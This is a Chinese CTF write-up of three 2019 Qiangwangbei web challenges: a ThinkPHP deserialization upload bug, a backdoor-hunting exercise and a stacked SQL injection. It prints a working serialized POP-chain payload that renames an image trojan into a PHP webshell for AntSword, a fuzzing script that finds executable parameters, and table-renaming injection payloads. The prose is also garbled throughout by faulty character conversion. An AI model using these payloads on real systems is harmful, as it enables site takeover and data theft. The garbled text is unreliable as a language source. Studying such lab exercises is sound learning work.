2019 第三屆強網杯線上賽部分web復現

0x00前言

週末打了強網杯，隊伍只作得出來6道簽到題，web有三道我仔細研究了可是沒有最終作出來，賽後有在羣裏看到其餘師傅提供了writeup和環境復現的docker環境，因而跟着學習一波並記錄下來

 

0x01 upload

第一步掃目錄發現有備份文件

 

下載下來後大體瀏覽就清楚是thinkphp5框架，而且沒有遠程代碼執行漏洞

根據題目的數據傳輸狀況，能夠發如今登陸後有個user的cookie值，base64解碼後是序列化字符串

 

查看源碼，發現序列化字符串傳入的位置是在Index.php的login_check()位置

正常狀況下是反序列化後是個數組，而後經過這個數組的屬性和數據庫的各個字段進行查詢驗證來返回是上傳文件與否的回顯

繼續瀏覽發現Profile.php文件中有2個模式方法，因而想到了pop鏈的構造，

可是要調用__get()須要訪問不存在的變量或者私有變量，調用__call()須要訪問不存在的方法或者私有方法

而Profile.php類中是不存在這種狀況的，繼續尋找找到Register.php中的Register類的析構方法調用了check對象的index()函數

check對象的index()參數是在Profile.php中不存在的，所以思路以下

反序列化傳入一個Register對象，而Register對象的checker成員的值是Profile對象，這樣就能觸發Profile對象中的__call和__get方法了

陷入的困境：

在比賽時候作到這都還好，可是死活無法直接代碼執行，以後還去thinkphp裏面找有沒有可以代碼執行的pop鏈，無奈都失敗了

最重要的是個人poc把單獨的類擰出來（在windows下搭這個tp5項目數據庫添加後估計路徑有問題致使無法正常執行）能夠觸發，可是放在這個環境下運行就會出錯。

因此比賽的時候作到這裏就卡住了，也沒作出來

最後新get到的點：

後面看了師傅的writeup才發現生成反序列化的類文件須要加命令空間纔不會反序列化錯誤....(該死的thinkphp)

再者沒法直接代碼執行，可是能夠調用Profile類中的upload_img()能夠上傳自定義文件名

仔細觀察這段代碼的邏輯

第一個判斷if($this->checker)要確保不會執行，只有checker成員不賦值

第二個判斷if(!empty($_FILE))也要確保不會執行，只須要不上傳文件請求就行

第三個判斷if($this->ext)須要執行

第三個判斷中的第一個判斷if(getimagesize($this->filename_tmp))須要執行，全部必需要保證filename_tmp的文件是個圖片馬，單純的一句話過不了這個判斷

接下來會把filename_tmp(先前傳上去的圖片馬路徑)更名成filename(新的php文件)便可

後面的update_img()就是改數據庫中的img字段的值，但其實在copy命令以後已經可有可無了

payload以下，這裏圖片的路徑我設置的絕對路徑，相對路徑也能夠

<?php namespace app\web\controller; class Register{ public $checker; public $registed; public function __construct() { $this->checker=new Profile(); } } class Profile{ public $checker; public $filename_tmp = "/var/www/html/public/upload/e5a32351a6802ef0291ac7c4529588da/f383a31abdcf931f89bae4ab05d3e088.png"; public $filename = "/var/www/html/public/upload/e5a32351a6802ef0291ac7c4529588da/shell.php"; public $upload_menu = "upload_img"; public $ext = "1"; public $img; public $except = ["index" => "upload_menu"]; } $clazz = new Register(); echo serialize($clazz); echo "<hr>"; echo base64_encode(serialize($clazz)); ?>

把結果用cookie發過去

而後找到upload目錄，已是shell.php的模樣了，蟻劍鏈接便可（個人圖片馬結尾存在<致使直接在頁面執行還要查看源碼，因此就用鏈接器了）

 

 鏈接的效果

 

0x02 精明的黑客

這道題考察的是自動審計代碼的python腳本編寫能力，源碼都有3002個，每一個又有好幾百行，一個個看幾乎不可能

通常的命令執行system,eval,assert,``,exec等在參數還沒傳到目標的時候就已有被賦值成空，或者存在一個根本不可能過的判斷式子

因而只有用腳本審計了，寫法是先獲取每一個文件的$_GET和$_POST的參數，自定義賦值好比 echo "hello_qwb_qwb"; ，而後在本地把代碼掛上去，用requests發get或者post請求，查看有沒有"hello_qwb_qwb"的回顯，若是有那麼就是後面的參數了

emmmm.....python功力有點差，因而看看主要的函數

打開目錄獲取文件名函數：https://www.cnblogs.com/strongYaYa/p/7200357.html

獲取$_GET和$_POST的使用正則規則：https://www.liaoxuefeng.com/wiki/897692888725344/923056128128864

打開文件操做：https://www.runoob.com/python/python-files-io.html

腳本以下，單線程太慢了，這裏用了8個線程，windows的powershell跑python多線程真的不如linux

import requests import re import os import urllib import Queue import threading payload = 'echo "hello_qwb_qwb";' url = 'http://127.0.0.1/qwb/src/'

def fuzz(filename): file = open("./src/" + filename, "r") #print "[*]open:" + filename
    text = file.read() getpattern = re.compile(r'\$_GET\[\'(.*)\'\]') get = getpattern.findall(text) postpattern = re.compile(r'\$_POST\[\'(.*)\'\]') post = postpattern.findall(text) file_url = url + filename for g in get: r = requests.get(file_url + "?" + g + "=" + urllib.quote(payload)) if "hello_qwb_qwb" in r.text: print "[+]file:" + filename print "[+]get:" + g exit() for p in post: data = {p : payload} r = requests.post(file_url,data=data) if "hello_qwb_qwb" in r.text: print "[+]flie:" + filename print "[+]post:" + p exit() print "[*]finish:" + filename file.close() class TextThread(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.__queue = queue def run(self): global text queue = self.__queue
        while not queue.empty(): filename = queue.get() fuzz(filename) def main(): queue = Queue.Queue() for filename in os.listdir('./src'): queue.put(filename) thread_count = 8 threads = [] for i in range(0, thread_count): thread = TextThread(queue) thread.start() threads.append(thread) for thread in threads: thread.join() if __name__=='__main__': main()

運行中找到目標

 

獲取flag

 

0x03 隨便注入

這道題賽後才知道是堆疊查詢，由於平時作題沒有遇到使用multi_query()的狀況，因此比賽時一直考慮有沒有什麼辦法不借助select能查到其餘table的值

瞭解它的waf後我當時是絕望的

可是由於是堆疊注入因此能夠從頭開始寫sql語句

可用經過show查到數據庫，當前數據庫的表,盲注和報錯注入也能夠獲取當前數據庫名是supersqli

?inject=';show databases; ?inject=';show tables;

 

 

 

能夠用describe 命令查表有哪些字段

?inject=';describe tablename;

 

這裏的payload不加` 還顯示不出來，此時已經能夠知道flag的位置了，可是沒辦法讀出來

這時候要把 `1919810931114514`表裏命名成當前的表名`words`，再用or '1'='1就能查到了

在php層面查詢的時候固定語句通常是 select * from words where id = $id這種，數據庫裏面的變化php是管不到的

更名在mysql中是rename，語法爲

rename table `當前表名` to `改後表名`;

可是又由於words中是存在列id，估計查詢語句也會根據該字段進行查詢，可是裝有flag的表裏面沒有id字段，所以要用alter來添加，語法

alter table `表名` add(字段名 字段類型 NULL)        #可爲空

咱們能夠以前經過describe查看`words`裏面的id的字段類型，

是int，因此咱們的alert能夠寫成這樣

alter table `1919810931114514` add(id int NULL)

最終的payload以下

?inject=';alter table `1919810931114514` add(id int NULL);rename table `words` to `tmp`;rename table `1919810931114514` to `words`;
#先添加一個叫id字段，能夠爲空
#再把words命名成任意名字
#把`1919810931114514`命名成word

最後用' or '1'='1 顯示「當前表」的因此內容就能獲取flag

 

 

0xff結語

本次writeup就是簡單記錄下本身遇到的坑吧，文章借鑑大佬的思路，本身跟着作一遍orz

感謝師傅提供的docker項目：

https://github.com/glzjin/qwb_2019_upload

https://github.com/glzjin/qwb_2019_supersqli

https://github.com/glzjin/qwb_2019_smarthacker

以及writeup

https://www.zhaoj.in/read-5873.html?tdsourcetag=s_pcqq_aiomsg